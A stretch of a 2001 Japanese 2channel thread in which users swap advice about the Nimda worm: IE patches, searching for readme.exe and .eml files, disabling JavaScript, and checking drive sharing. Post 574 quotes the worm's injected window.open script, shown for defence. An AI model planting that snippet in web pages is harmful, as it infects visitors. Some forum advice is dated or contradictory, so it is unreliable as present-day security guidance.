名無しさん :01/09/19 16:48 ID:t5ePDc5w
388 :
マシリト総理 ◆84VbUMtQ :01/09/19 16:49 ID:eKw5kRXU
>>342 ie5setup.exeならただの起動ファイルだと思う
実行したらインストールしてあるコンポーネントに応じて
必要なファイルをダウンロードしてくるはず
389 :
:01/09/19 16:50 ID:r3BBNxwQ
390 :
:01/09/19 16:54 ID:f7NLWTrQ
IE5.5sp2一時間以上かかるんですが、これでいいの
>>390 皆ダウンロードを始めているので遅いです。
392 :
375 :01/09/19 16:56 ID:f7NLWTrQ
>>384 そうでした。かなしー超初心者です・・・
393 :
:01/09/19 16:57 ID:TTQxvtB6
394 :
:01/09/19 16:58 ID:GBTxzJMs
検索してみたら、『readme.exe』だけが見つかったんだけど、 これって感染してるんでしょうか? 今のところ、感染の症状らしきものは何もないんですが。
395 :
:01/09/19 16:58 ID:f7NLWTrQ
30分ぐらいになってました。表示では一時間以上だったんだけど
396 :
:01/09/19 16:59 ID:f7NLWTrQ
こっちに書き込んでるとやっぱダウンロードも遅くなるんでしょうか
397 :
お昼 :01/09/19 16:59 ID:k3oIsIQw
午後12時くらいは、もっとスカスカだったのにな こんなになるとは
398 :
:01/09/19 16:59 ID:.cHQDFeM
「これって感染してるの?」と聞く前に 冷静に過去ログを読みなさい。
399 :
名無し :01/09/19 16:59 ID:zfuBxYlQ
俺も「IE5.5SP2」ダウンロードしようと思ったんだけど、やっぱり メチャ時間掛かるんだね、途中でやめちゃったよ。 電話代もったいなくても更新すべきか?
400 :
かりん :01/09/19 16:59 ID:wtGoMrqY
ここを読んで、早速IE5.0をダウンロードしました。 でも不安になってさらにIE6.0にバージョンアップしたんだけど、 すっごい時間がかかっちゃた・・・。 今更ながらですけど、IE6.0のメディアってかっこいいですね!
401 :
:01/09/19 17:00 ID:6741/eko
>>396 そんなに変わりはない・・はず。
回線によるかモナー
403 :
あ :01/09/19 17:03 ID:zfuBxYlQ
自分のブラウザのバージョンを知るには何処を見ればいいの?
404 :
:01/09/19 17:03 ID:tMWklW4A
405 :
しょしょしんしゃ :01/09/19 17:03 ID:k3oIsIQw
今、発売中のパソコン雑誌の付録の IE5.5いれても、ダメですよ。 マイクロソフトまで、取りに行きましょう。
406 :
ヽ(´ー`)ノ :01/09/19 17:03 ID:M04LoXGc
>>243 さん
IP4 SP2のユーザーです。私もこんなことでバージョンを更新したくないと
思っていたところでしたので、ご教示助かりました。さっそくscriptを無効
にして、ちょっと安心しています。
2ちゃんねるのニュース速報版もニューヨーカーみたいに、危機に際しては
親切な人が出てくるんですね。感謝です。
407 :
:01/09/19 17:03 ID:6741/eko
408 :
:01/09/19 17:04 ID:uoDPka6U
409 :
:01/09/19 17:04 ID:uoDPka6U
かぶっちゃったヽ( ´ー`)ノ
410 :
:01/09/19 17:05 ID:6Fem1rMY
>>358 >McAfee VirusScan Schedular 4.0.3a
少し古いけど、これは、エンジン部分のバージョンだから、
むしろ、定義ファイルのバージョン(日付)の方が重要です。
411 :
:01/09/19 17:05 ID:GBTxzJMs
>402 どうもありがとうございます。 ウイルススキャンやってみます。
412 :
:01/09/19 17:06 ID:ltlOjxgU
でもJavaオフにするとMSのサイトとか見れねえんだよな。 クソめんどくせえ。
413 :
:01/09/19 17:06 ID:mMROBpHE
414 :
:01/09/19 17:06 ID:6741/eko
関係無いのだが、ブラウザうpデートしたらMXの調子がおかしくなった。
415 :
:01/09/19 17:09 ID:dzMHUcWY
ここもwhile(1){} か・・・ 鬱だ、氏のう・・・
416 :
:01/09/19 17:08 ID:AXdw0Hxk
国連関連のWEBにウィルスがあったので通報したらすぐにサーバーを止めたとの 返事が帰ってきた。世界は俺の手で救われた。( ̄ー ̄)ニヤリ
417 :
:01/09/19 17:11 ID:AOaX/eHc
2ちゃんねる自体から感染することはある?あと感染してたら2ch見るの控えた方がいいんだろうか
419 :
「´Д´д`」@ビッグボディチーム :01/09/19 17:11 ID:J0FhYHSg
なんとなくIEの上位バージョンをダウソしてみた。 みんな同じことやってるみたいだな・・・LANなのに異様に重い・・・
420 :
:01/09/19 17:13 ID:LPyMVUd2
421 :
:01/09/19 17:16 ID:t5ePDc5w
IE6にしました。 そしたら、2chの移動された板が文字化けします。 文字化けする人はこちらって所に行くと最初の画面は見れるんですが 過去ログが文字化けで見れません。 どうしよう・・・。
424 :
:01/09/19 17:17 ID:R19Fmukc
◆コード・レッド上回る感染力の新ウイルス、FBIが警告 米連邦捜査局(FBI)は18日、極めて感染力が強い新種のコンピュ ーター・ウイルス「W32NIMDA」が広まりつつあるとして注意 を呼び掛けた。7月にインターネットの情報の流れを滞らせ、ホワイト ハウスのサーバーを攻撃した「コード・レッド」よりも広範囲に被害 をもたらす可能性があるという。 ウイルスは「Admin(政府)2(to)3W(War)」、つまり「第三次 世界大戦へ向かう政府」という意味のことばを逆に書いたような名称。 このため、先週の同時テロとの関係を指摘する声もあるが、アシュク ロフト司法長官は記者会見で、「ウイルス感染と同時テロとを結びつ ける証拠は現時点では得ていない」と述べた。 ウイルスは昨日から電子メールの添付ファイルとともに急速に広がり 出し、サーバーやパソコンへの感染は数万件に達している模様だ。 「README.EXE」の名前が付いた電子メールのファイルを開いて感染 した例が報告されている。(ワシントン=安藤淳)
426 :
:01/09/19 17:19 ID:oaR/VUnY
>>413 ありがと。
BeckyにしろDatulaにしろmboxに変換しちゃえば何とか過去メールの
移行はできそうですね。
悩ましい。
427 :
:01/09/19 17:18 ID:mJYJCLtQ
>>418 Apple USのサイトにQT用のActiveX Controlがうぷされてるよ
428 :
:01/09/19 17:19 ID:mMROBpHE
IEやめてNetscape4.78にしる〜
429 :
:01/09/19 17:19 ID:mJYJCLtQ
>>418 Apple USのサイトにQT用のActiveX Controlがうぷされてるよ
>>428 せめてmozillaかnetscape6にしてくれ・・・
431 :
莇さん :01/09/19 17:21 ID:R7qYfRPo
432 :
名無しさん :01/09/19 17:22 ID:t5ePDc5w
433 :
マホメット :01/09/19 17:22 ID:9N7NeOAQ
IE6にうpデートしたら2chが文字化けして見れないよ〜 誰かなおす方法教えて〜〜〜〜〜!
434 :
:01/09/19 17:22 ID:TTQxvtB6
IE5.5SP2をダウンロードしたら、デスクトップに インターネットに接続っていうアイコンが新しくできたよ これ削除してもいいよね?
435 :
:01/09/19 17:23 ID:oaR/VUnY
>>417 過去ログにもあるが、2ちゃんねるはMSのサーバ使ってない(apache)らしいから、
2ちゃん自体から感染することはないです。
もちろん張ってあるURL安易につついたら、話はべつだけど。
436 :
:01/09/19 17:23 ID:BS1IhpDc
IEを起動するとインターネット接続ウイザードが表示されるので、 それを進めていけば自動的に消えるはず。
438 :
:01/09/19 17:24 ID:mMROBpHE
密かな疑問なんですけど・・・ 暗号強度128-BITって具体的にどこを強化しているの?
440 :
:01/09/19 17:25 ID:LPyMVUd2
勝手にお気に入りのとこに、MSNがはいってるねんけど なんで?
>>439 httpsで始まるWebサイトを見たときに、128ビットの暗号鍵が使えるようになる。
442 :
まる :01/09/19 17:25 ID:L3v/intc
>>437 それは>434へのお答え?
私も消えないんだけど・・・IEを起動してもそんなウィザード出ないよぉ。
443 :
readmeで :01/09/19 17:25 ID:ZQRPD4GE
検索したら9/19作成でreadme[1] 種類Outlook Expressメールメッセージ、 があって、開くとアウトルックが起動してダウンロードするか聞いてくる・・・。 例のやつ? 削除すればいい?
444 :
? :01/09/19 17:26 ID:IkFnIuAs
445 :
:01/09/19 17:26 ID:oaR/VUnY
>>439 SSLで情報送信するときでしょう。
他になにかあったかな?
446 :
:01/09/19 17:26 ID:w2RvISP6
あのさ、ダウンロードがめんどくさかったら、しばらく一時的にでも ネスケ使えば?雑誌とかについてる付録ですぐインストールできるし。
447 :
:01/09/19 17:27 ID:mMROBpHE
>>430 だってnetscape6は不安定過ぎ。今のところは4.78が賢明と思う。
netscapeだって6に自信ないから4.75→4.78のヴァージョンアップしたんでしょ?
>>442 済まぬポインタ指定してなかった・・
アイコンについては特に必要性はないので消してOKです。
449 :
:01/09/19 17:28 ID:t5ePDc5w
IE6にして、2ch文字化け・コピペも出来ない。 誰か助けてください〜!
450 :
名無しさん439 :01/09/19 17:28 ID:sLg3ofKQ
>>441 -445
レスありがとです〜
とりあえずこれで安心なんでしょうかね?
これから自己防衛だけでも勉強してみます。
451 :
:01/09/19 17:28 ID:4YsZA8ZQ
IE6のクッキーの設定はどうすればいいのか?
>>447 それならmozillaで良いのでは。0.9.3くらいからいなり安定して動くよ。
netscapeみたいに謎のソフトウエアも入らないし(藁
453 :
:01/09/19 17:29 ID:FOUOJ5Cg
今ニュースで言ってたけど、農水省も感染だって
454 :
:01/09/19 17:29 ID:Ims7haog
>ウイルスは「Admin(政府)2(to)3W(War)」、つまり「第三次 >世界大戦へ向かう政府」という意味のことばを逆に書いたような名称。 これ、日経の記事だろ。日経の記者、頭わるー。
456 :
メーラ :01/09/19 17:30 ID:FiG8OYGE
メーラはAL-mailがいいと思うんだが 本筋には全く関係ない
457 :
:01/09/19 17:31 ID:hqqGjeEU
今アクセスしたら18通もメール来ててびっくりしたよ。 ほとんどワームだった(鬱)
458 :
:01/09/19 17:33 ID:/LsUGfPI
ネスケ6.1になってチョトまともになった。
459 :
:01/09/19 17:34 ID:KU2LWOU6
ねえ…… これって冗談抜きで、サイバーテロの始まりじゃないの? どんどんすごいのがでてきたりして……。
460 :
:01/09/19 17:37 ID:LPyMVUd2
近畿掲示板見ようとしたら、「新しいファイルをダウンロードしてくれ」 って出てんけど、どうゆう事???
461 :
:01/09/19 17:38 ID:w2RvISP6
>460 やられたね。
462 :
スーパー初心者ですが :01/09/19 17:39 ID:GycrK3Aw
>14 >の2:Cドライブがネットワーク共有を勝手にされていたら感染している 共有されているかはどうやって確認するんですか? ガイシュツだったらごめんなさい。
463 :
:01/09/19 17:40 ID:LPyMVUd2
464 :
:01/09/19 17:40 ID:6ajOW/yo
サーカムのときもそうだったが、今回も感染メールこないねえ。 まあ、プロバイダのウイルスチェックが働いている証拠なんだろうけど。
465 :
:01/09/19 17:40 ID:jRZmvYDw
ネスケの4.75→4.78のアップデートは必要なんでしょうか?
467 :
:01/09/19 17:42 ID:tfoaN1Ng
SP2をダウンロードできないよ〜 再開してもブチブチ切られるコンチクショウ。
>>462 エクスプローラを開いてC:ドライブを選び、右ボタンから「プロパティ」。
ただし、Windows NT/2000の場合はOS標準の振る舞いで"C$"という名称で
共有がかかっているが、これについては問題はないので注意。
また、Windows NT/2000の場合はAdministratorsグループに所属しているとか
管理権限が必要なので注意。
469 :
:01/09/19 17:44 ID:mMROBpHE
470 :
ななし :01/09/19 17:44 ID:twveTs.w
IE5.5 SP2が欲しいって奴は近所の電気屋とかに走って DIONの販促用のCD-ROMもらってこい あれに入ってるぞ
471 :
:01/09/19 17:45 ID:LPyMVUd2
472 :
:01/09/19 17:45 ID:oaR/VUnY
>>456 ありがと。
結局使いこんでるメーラーが一番使いやすいってことかな?
確かに本筋から外れてるので、あとは自分でいろいろ調べてみます。
473 :
:01/09/19 17:47 ID:e.vWKlVo
\ ウイルスに警戒せよ / \ ウイルスに警戒せよ/ ΛΛ ΛΛ .ΛΛ (,,゚Д゚) (,,゚Д゚) (,,゚Д゚) (| |:|) (| |:|) (,| l:|) .|__|:| |__|:|, |__|:| |__|_|. |__|_| |__|_| ∪U U∪ UU
474 :
:01/09/19 17:48 ID:b8GdSDcM
>>460 =
>>471 どこのことを言ってるのかもわからないし、
どういう状況なのかもわからない。
これじゃ何も言いようがない。
475 :
ななし :01/09/19 17:51 ID:qY7BIX9w
ファイル検索したらreadme.exeファイルがあったんですけど、更新日時が 97年だったんですか、これって感染してるんですか?
476 :
252 :01/09/19 17:53 ID:bcBbDb0k
252で、PS2へのバージョンアップについて皆さんに教えていただいた者です。 その後、このスレで教えてくださっているウィルスに感染してないかどうかの チェックもしました。(本当は順番逆ですか?すみません。混んでいて?入れず やっと終わりました)感染はしていませんでした。安心しました。 しつこいようですが、個別の質問に答えてくださった方、まとめを何度も書いてくださった方、 親切な皆さん、本当にありがとうございました。 引き続き冷静にこのスレで勉強させていただきます。 他の初心者の皆さんも落ち着いて頑張ってくださいね。
>>475 身に覚えのないファイルなら削除しましょう。
削除して再チェック。
ああーー! IE6インストールしたら、何かエラーらしくて、ネット使えなくなったよ。 メールと、カチューシャで2chはできるけど、他ができん! ちくしょう。
情けない質問ですみません。 IEをアップデートしたら「д」等の記号が太線で表示されるようになってしまったんですが どこで直せるんでしょうか?
480 :
ななし :01/09/19 18:00 ID:qY7BIX9w
>>477 ありがとうございます。
トレンドマイクロのオンラインチェックで感染ファイルがなければOKなんですよね?
481 :
q :01/09/19 18:01 ID:u8nXgCCU
Autoプロテクトにもしてるし、スキャンも問題無かったのに、 私だけ開けないサイトがいくつかあるようです(例えば郵政省のHP) これは私が感染してるんでしょうか?ウィルス定義の更新もちゃんとしてます。 ただまだIE5.5のSP1ですけど。他板でリンク張ったらみんな軽く開いた・・・。
482 :
スーパー初心者462 :01/09/19 18:01 ID:GycrK3Aw
>468 レスありがとうございます。 見たら空き容量が何十バイトかとクリーンアップボタンがあるんですが、 これなら大丈夫なんですよね? というか、共有されていたらどう表示されるんですか?
484 :
:01/09/19 18:02 ID:mMROBpHE
485 :
あ :01/09/19 18:04 ID:VjQMha0A
皆さんやさしいですね・・・ 茶化す人もいないし・・ 2ちゃんねらー見直した。
>>480 ほぼ問題ないと考えて良いでしょう。が、これからも注意は怠らないようにしましょう。
>>482 共有されていたらドライブのアイコンに「手で持ち上げているようなアイコン」が表示されるはず。
Windows NT/2000だとデフォルトの振る舞い(
>>468 )があるので、それとは区別しましょう。
それ以外の場合はそのアイコンがあればさっさと解除しましょう。
また、そもそもプロパティ内に「共有」がなければ特に問題はありません。
念のためウイルスチェックは忘れずに。
487 :
1 :01/09/19 18:04 ID:b8GdSDcM
488 :
:01/09/19 18:05 ID:vsUFHtfk
489 :
1 :01/09/19 18:06 ID:b8GdSDcM
>>485 普段煽ったり荒らしたりしてるのは経験の少ない人間と思われ。
誰かがどっかのスレで書いてたけど、
経験と態度の大きさは反比例するって。
490 :
:01/09/19 18:06 ID:4YsZA8ZQ
IE6入れたけど、今のところ問題ないようだ。
>>489 それは思いっきり人によると思われる。
アアスレチガイ
492 :
489 :01/09/19 18:07 ID:b8GdSDcM
>>488 恐らく大丈夫。とはいえ誰も保証してくれないので注意。
>>483 あ、これはお気遣いありがとうございます。
でもそれも判らないんですよね。
最近全体的に不安定だったんで、
OSごと入れなおすいい機会だと思ってます。
お心遣いは感激しました。どうもです。
495 :
ななし :01/09/19 18:09 ID:qY7BIX9w
>>486 ありがとうございます。
幸いオンラインチェックでは問題ありませんでした。
ところでもし感染してる場合、今度のウイルスでは
メーラーを開いたとたんにアドレス帖にはいってるあて先に
ウイルスメールを勝手に送りつけるのでしょうか?
496 :
:01/09/19 18:09 ID:t5ePDc5w
>>490 2chの他の板、文字化けしない?
コピペはできる?
漏れのは、できないんだよ・・・
497 :
名無しさん :01/09/19 18:09 ID:Y0FK2RD.
日テレでやってるよ
498 :
今、帰宅。ビクーリ! :01/09/19 18:10 ID:iK.BW4jo
今、IE5,5SP2 にして、ノートン先生の定義を最新にしましたが、 OE起動して、ワームが一杯来てたら、どうすれば? 削除すればいいのかな…? (怖くてまだOE立ち上げてない)
499 :
481 :01/09/19 18:13 ID:u8nXgCCU
>>487 レスありがとうございます。「開いています」と出ますが開けません。他に原因があるようなので、他板
できいてきます。
500 :
名無しさん :01/09/19 18:13 ID:AYshM8WQ
で、もとからIE5.1sp2 IE5.5sp2 IE6の人は安全なのね?
501 :
:01/09/19 18:18 ID:/LsUGfPI
>>500 サイト見たら即感染→あぼーんが避けられるだけ。
ダウンロードしますか?とかいう画面が出る。(出たらキャンセルだぞ)
不安ならJacascript切っとけ。
502 :
482 :01/09/19 18:19 ID:uA1sjTpY
nanasisanさん(さんつけたら変?)、いろいろありがとうございます。 とりあえず大丈夫そうなのですが ノートンでスキャンしたらメモリ不足でフリーズ。 再起動になりましたが問題ないようでした。 YBBの共有の話題にもびびりまくりでしたが少し安心しました。
503 :
501 :01/09/19 18:19 ID:/LsUGfPI
×Jacascript→○Javascript 鬱だ氏のう・・・
504 :
超若葉 :01/09/19 18:23 ID:Fgn4LW2.
あのう、今回のウイルスはMacにはなんら被害を 及ぼさないんでしょうか? ガイシュツだったらごめんなさい。
過去ログ読んできたんですが似たような書き込みが無くわかりませんでした…。 どなたか教えてください…。
506 :
名無しさん :01/09/19 18:25 ID:Y0FK2RD.
507 :
:01/09/19 18:26 ID:SrdCnHVQ
508 :
:01/09/19 18:28 ID:t5ePDc5w
IE6で、どうやったら文字化けせずに2chを見れますか 「スレッド一覧」が文字化けしてしまうので、下がっているスレがみれません。 誰か助けてくださーい・・・
509 :
:01/09/19 18:29 ID:V/j2hVSc
JOKE_BUTTONSていうウィルスが見つかったんですけどどうすればいいですか?
510 :
:01/09/19 18:29 ID:O6P1VIIo
ダメだ・・・ 5.5SP2入れようとしてもタスクスケジューラの署名のとこで いつも回線切られちまうよ。 ここクリアできた人はどうやったか教えて欲しいっす。
511 :
:01/09/19 18:31 ID:/Po0AYgw
おいテレビニュースみたぞ。何だか変なウィルスが広まっているらしいな。 サイバーテロだとか。 危険すぎるぞおい。
512 :
504 :01/09/19 18:32 ID:zD/ryl9A
513 :
:01/09/19 18:32 ID:JgAOGVbo
>>508 おれなんか過去ログみようとすると、 ファイルのダウンロードウインドウが出るんだけど。
514 :
:01/09/19 18:32 ID:n6tEsqf2
検索で「名前」、「含まれる文字列」、「探す場所」とかどうゆう設定にすればいいのですか? 「名前」は僕の名前ですか? 「含まれる文字列」というところに.『*.eml』『readme.exe』『MEP51B3.TMP.EXE』 を入力すればいいですか?『』←これもいりますか? 「探す場所」はどこですか?
515 :
:01/09/19 18:33 ID:Z3m0RcSg
今バージョンアップしたんですけど 更新情報「;SP2;」になてたらOKなんですよね。
516 :
:01/09/19 18:34 ID:186vJgXg
517 :
_ :01/09/19 18:34 ID:I9BxOHX.
IEアップデートできない…。全然DLできない…。泣きそう。 セキュリティのjavascript関係全部無効にする、だけで なんとかしのげるでしょうか? メーラもoutlook expressは使うのやめたほうがいいですか?
518 :
_ :01/09/19 18:35 ID:BHKeU2R.
>510 今5.5なの? タスクスケジューラー停止してインストするとか。
519 :
:01/09/19 18:35 ID:qWuPgyw6
ダメな奴はネスケ使え。
520 :
:01/09/19 18:36 ID:t5ePDc5w
521 :
( ゚д゚)ゴルァ! :01/09/19 18:37 ID:2Btp1QlY
522 :
:01/09/19 18:39 ID:O6P1VIIo
>>518 5.5SP1です。
タスクスケジューラ停止してます。
過去ログ読んだら同じとこでつまづいてる人いますね・・・
523 :
:01/09/19 18:40 ID:vbCAjpuo
ネットにつないだ瞬間、!!オメデトウ!!どうのこうのと 画面いっぱいに英語で、でてしまうのだが・・・なんでしょう?
>前回のインストールが完了してません >IEのセットアップを実行する前にコンピューターを再起動して、 >そのインストールを終了してください。 >セットアップは終了します。 と表示され、SP2もIE6もインストールに移る事すらできません 何度再起動しても同じです。 どういうわけでしょうでしょう? 誰か対処法がわかる人いましたらよろしくでし。
525 :
_ :01/09/19 18:42 ID:BHKeU2R.
>523 おめでとう。あなたが100万人目の感染者です。
loadme.exeでなくload.exeだった┐(´〜`;)┌
527 :
:01/09/19 18:44 ID:bi15wNtM
MSNサイトってそもそもJavascript ONにしないと何にも見えないじゃん。
528 :
名無し :01/09/19 18:44 ID:47ZPRi3E
Ver6.0じゃダメなのか?不安だ。
529 :
:01/09/19 18:46 ID:qWuPgyw6
あのさー、ネタでも何でもなく、素直にネスケ使えばいいじゃん。 不具合でたり、時間かかったり、面倒なだけだよ。 どうせみんな雑誌の付録CD−ROMの1枚ぐらい持ってるでしょ。 5分もあればインストールできるんだから。 何時間もあくせくするよりなんぼかましだよ。
530 :
:01/09/19 18:46 ID:/LsUGfPI
>>527 MSNがそれだけ糞サイトということですよ(藁)
531 :
山 :01/09/19 18:51 ID:iK.BW4jo
>>529 わかった。そうする。
ところで、どのVerがお勧め?
(寝助、使った事無いからな〜)
532 :
:01/09/19 18:51 ID:VnO8pFQc
MNSに逝く人って、何の用事があって逝くわけ?
533 :
:01/09/19 18:52 ID:nqb1CbEs
Windowsの検索でor検索ってどうするんだっけ?
534 :
( ゚д゚)ゴルァ! :01/09/19 18:52 ID:2Btp1QlY
ろくに自分とこのホームページのセキュリティも確保できないような MSNがJavaScriptオンじゃないと見れないようなサイト作るな( ゚д゚) !
スーパー初心者のためのMSNウイルスくれ。 に見えてしまう(鬱
536 :
:01/09/19 18:56 ID:8MvljIUI
こーゆー騒動のときWebメールって便利だな
537 :
:01/09/19 18:56 ID:qWuPgyw6
>531 4.75か4.78でいいのでは? おれは4.75使ってるけど。
538 :
山 :01/09/19 18:58 ID:iK.BW4jo
>>537 さんくす。家中のCD-ROM漁ってみる。
>>531 537に同意。
私は4.78使ってます。
540 :
(・∀・)イイ! :01/09/19 19:00 ID:GuXyBCPA
541 :
nc使用 :01/09/19 19:03 ID:dn5covrA
ver4.78に一俵
542 :
MNS :01/09/19 19:04 ID:Vsdv/Nrc
543 :
:01/09/19 19:04 ID:BvaOJetc
ネスケの4.xxってCSSの解釈がボロボロじゃなかったっけ?
544 :
:01/09/19 19:05 ID:BvaOJetc
かといって6.xは重すぎて使えないし…。
545 :
:01/09/19 19:05 ID:f1RIjs76
>>532 MNSには逝かんが。
単にセットアップデフォルトを変更してないだけでは。
……って、デフォルトは/homeなのか?
546 :
:01/09/19 19:05 ID:186vJgXg
>>542 たしかに多くの人は逝く用事ないなこのページ(w
547 :
:01/09/19 19:06 ID:BnRrb8v.
548 :
:01/09/19 19:07 ID:4YsZA8ZQ
IE6を入れたけど、設定は何もいじらなくて いいのかな?
問題が発生したため、Microsoft Internet Explorer を終了します。 ご不便をおか けして申し訳ありません。 ↑みたいなメッセージがでてきてサイト見ようとしてもすぐウィンドウが閉じちゃう んだけど、どうなってんの? 以前5.5落とした時も同じエラーメッセージがでて使えずにずっと5.0使ってる んだけど…
550 :
:01/09/19 19:07 ID:vArgEgZM
>>515 うちも同じ表記だったから大丈夫でしょ。
ちなみに10日前に、5.5SP2入れたばかりでした。
551 :
:01/09/19 19:08 ID:bi15wNtM
>>514 かわいそうなのでレス。
『*.eml』『readme.exe』『MEP51B3.TMP.EXE』 を「名前」にいれます。
『』←これはいりません。
「探す場所」はC:です。
552 :
:01/09/19 19:09 ID:0vW2CaDA
今日の朝、思いっきり感染サイトが掲載されていたけどな(まらまら
553 :
? :01/09/19 19:09 ID:0vcXMVMA
?
554 :
:01/09/19 19:11 ID:.MhNxNaQ
えっと。毎週水曜日に同期をとらなくてはいけないページがあるんですが、ウィルス対策をしてると無理ですよね アクティブXもjava関連もダウンロードも無効にしてると、同期どころかページも表示されませんよね・・・・ おとなしく寝ろって事ですか?いつになったら大丈夫になるんですかね?結局WEBを見ないとわかんないですよね 24時間体制でインターネット関連情報を流してくれるTVがあるといいんですが・・・
555 :
クチビルゲ :01/09/19 19:11 ID:tY/Cq936
>問題が発生したため、Microsoft Internet Explorer を終了します。 ご不便をおか
>けして申し訳ありません。
ハゲシクワラタ
こんな低姿勢のメッセージMSが出すわけないもんな
>>549 質問するならマナーくらい考えろや
556 :
zz :01/09/19 19:12 ID:Pk6nKAOM
すみません、この掲示板いじくってたら今readme.exeをダウンロードしますか? って出てきたんですけど・・・これって まだ無事ですか?
557 :
:01/09/19 19:15 ID:2Y/4gKjw
>>556 他にコッソリと別のIEが立ち上がってると思われ
558 :
名無し募集中。。。 :01/09/19 19:16 ID:rl7votQQ
ウイルスバスター2001のパターンファイル番号は、現在「942」です。 ノートンアンチウイルス2001のパターンファイルは、9月18日版で定義数54005個です。
559 :
:01/09/19 19:16 ID:UgwcW/wo
そんな事よりみんな、ちょいと聞いてくれよ。スレとあんま関係ないけどさ。 このあいだ、ウィンドウズアップデートのサイト行ったんです。アップデートの。 そしたらなんか人がめちゃくちゃいっぱいでDLないんです。 で、2chに戻ったらなんか警告出てて、WEBを見るだけで感染するウイルス、 とか書いてあるんです。もうね、アホかと。馬鹿かと。 お前らな、ウイルス如きで普段来てないにアップデートサイトに来てんじゃねーよ、ボケが。 ウイルスだよ、ウイルス。 なんか親子連れとかもいるし。一家4台で感染か。おめでてーな。 よーしパパIE6もDLしちゃうぞー、とか言ってるの。もう見てらんない。 お前らな、ウイルス送ってやるからメアド教えろと。 アップデートってのはな、もっと殺伐としてるべきなんだよ。 回線の向こう側に座った奴といつ喧嘩が始まってもおかしくない、 ハクるかハクられるか、そんな雰囲気がいいんじゃねーか。初心者は、すっこんでろ。 で、やっと繋がったかと思ったら、隣の奴が、ネスケにしろ、とか言ってるんです。 そこでまたぶち切れですよ。 あのな、ネスケなんてきょうび流行んねーんだよ。ボケが。 得意げな顔して何が、ネスケにしろ、だ。 お前は本当にネスケを使いたいのかと問いたい。問い詰めたい。小1時間問い詰めたい。 お前、自分のヲタサイトがネスケにしか対応してないだけちゃうんかと。 アップデート通の俺から言わせてもらえば今、アップデート通の間での最新流行はやっぱり、 IE5.01、これだね。 IE5.01アラブ語フォント同時DL。これが通の落とし方。 アラブ語フォントってのはアラブ語が読める。そん代わりDLに時間がかかる。これ。 で、それに韓国語フォント(ハングル)。これ最強。 しかしこれを落とすと次からCIAと2chねらーにマークされるという危険も伴う、諸刃の剣。 素人にはお薦め出来ない。 まあお前、1は、新型ウイルスでも食らってなさいってこった。
560 :
(;´Д`)@ドリー :01/09/19 19:16 ID:0vcXMVMA
Winユーザーは大変だね。
561 :
zz :01/09/19 19:17 ID:Pk6nKAOM
>>557 さん
え、どう言う事なのでしょうか?
既に感染していると言う事でしょうか?
562 :
:01/09/19 19:19 ID:y3NKkmi6
>>549 わしのもです!IE5.5⇒6bにしてもなる。なんでやろな?
>>555 そうですね。読み返してみて自分でも問題あるなって思いました。すみません。
いろいろ試しているのですが、どうしてもだめみたいです。
よろしければどなたか教えていただけないでしょうか?
565 :
:01/09/19 19:21 ID:EV7ASG32
>>559 コピペワラタ。
〜のかと問いたい。問い詰めたい。小1時間問い詰めたい。
ここがいちばん面白いね。
566 :
笑死 :01/09/19 19:21 ID:Zp7vMJB6
567 :
:01/09/19 19:21 ID:YhNWzPO6
>>559 これのコピペっていつも面白いこと考えるよね。
ほんと関心する。
568 :
奈々氏 :01/09/19 19:24 ID:8HDieZTU
あの・・ IE5.5SP2をDL&installしたんですが、 IEのversionが5.51.4807.2300ってなってるんです。 ver 5.50.4807.2300っていうのは他の解説サイトにも載ってたんですが、 これって大丈夫なんでしょうか? ちなみにOSはWin Me です。よろしくお願いします。
569 :
:01/09/19 19:24 ID:qo8.QZ3.
570 :
557 :01/09/19 19:23 ID:2Y/4gKjw
>>561 ここが問題なのではなくて、どこか別のサイトが問題てことです
IE5.5SP2か、IE6でないなら感染してるはず
571 :
z :01/09/19 19:29 ID:Vn9GJDAo
>>561 さん
そうですか、どうもすみません。SP2入れたばかりなので心配でして。
572 :
_ :01/09/19 19:31 ID:Zp7vMJB6
ちょいと聞きたい。 IE5.5−SP2以下の人って JAVA&ActiveXをOFFってても 感染するんでしょうか?
573 :
:01/09/19 19:32 ID:BvaOJetc
>>572 JavaScriptを切ってれば大丈夫。
574 :
:01/09/19 19:34 ID:0vW2CaDA
<script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script> これを起動できないようにするためにJavaScriptオフ。
575 :
_ :01/09/19 19:34 ID:Zp7vMJB6
576 :
nanashi :01/09/19 19:35 ID:HFixfMC6
IE5.0で昨日MSN見たけどなんの感染もなかったよ。 多分いつも「こいつアンインストールしようかな?」と思ってた メガネが似合うノートンのオヤジがPCを守ってくれた。
577 :
:01/09/19 19:35 ID:vHNMmWF6
IE6導入したら「Д」が太字で表示されるようになったんだけど…
578 :
:01/09/19 19:35 ID:Aa1u4F6I
ところで「スクリプトによる貼り付け処理の許可」って何をするものなんですか?
579 :
:01/09/19 19:36 ID:UgwcW/wo
>574 またエロいタグ入れてんな〜これ。 でもjavascript切ったら見れるサイトかなり減るよね。
580 :
:01/09/19 19:36 ID:KNoHMc4Y
581 :
:01/09/19 19:38 ID:qq6rhHg6
Windows2000severに*.emlファイルが数百個出来てます。 削除してもまたいつのまにか作成されています。 どうしたらいいんでしょうか?誰か助けて〜!!
582 :
nanashi :01/09/19 19:40 ID:HFixfMC6
584 :
_ :01/09/19 19:40 ID:WrfZcpZQ
95ユーザでSP1までしかアップデートできないんだけどマズイですか?
585 :
:01/09/19 19:41 ID:qq6rhHg6
>>582 絶対いやだ!再インストールめんどくさいです。
っていうか初期化するしか対処方法ってないんですか?
586 :
:01/09/19 19:41 ID:plawXAu.
>581 なんでW2Kseverなんか入れたのって聞きたい。。。 そんな人が観戦するなんて信じられない〜〜 OSを再インストしてください。。。
587 :
名無しさん :01/09/19 19:43 ID:Y0FK2RD.
588 :
581 :01/09/19 19:43 ID:qq6rhHg6
×Windows2000sever ○Windows2000server
589 :
:01/09/19 19:43 ID:E8Omc7/c
検索しても引っかからなかったから、取りあえずは大丈夫かな…。
590 :
:01/09/19 19:44 ID:qq6rhHg6
>>586 会社のサーバーなんですよ。
クライアントが感染してサーバーも感染・・・。助けて!!
591 :
よくわからん :01/09/19 19:46 ID:mZcCViNs
感染すると、どんな症状になるの?
592 :
:01/09/19 19:46 ID:AHjGuvE2
IE5.5SP2でjava関連とかダウンロードとかOFFにしてると 同期って出来ないんですか?
593 :
:01/09/19 19:47 ID:yNH4JnFA
>>590 自分が踏み台になりたくなかったら、駆除ツールを待つ前に
速やかに再インストするしかないのでは?
594 :
:01/09/19 19:47 ID:vHNMmWF6
IE6導入したら「Д」が太字で表示されるようになったんだけど… これは直せないんでしょうか?
595 :
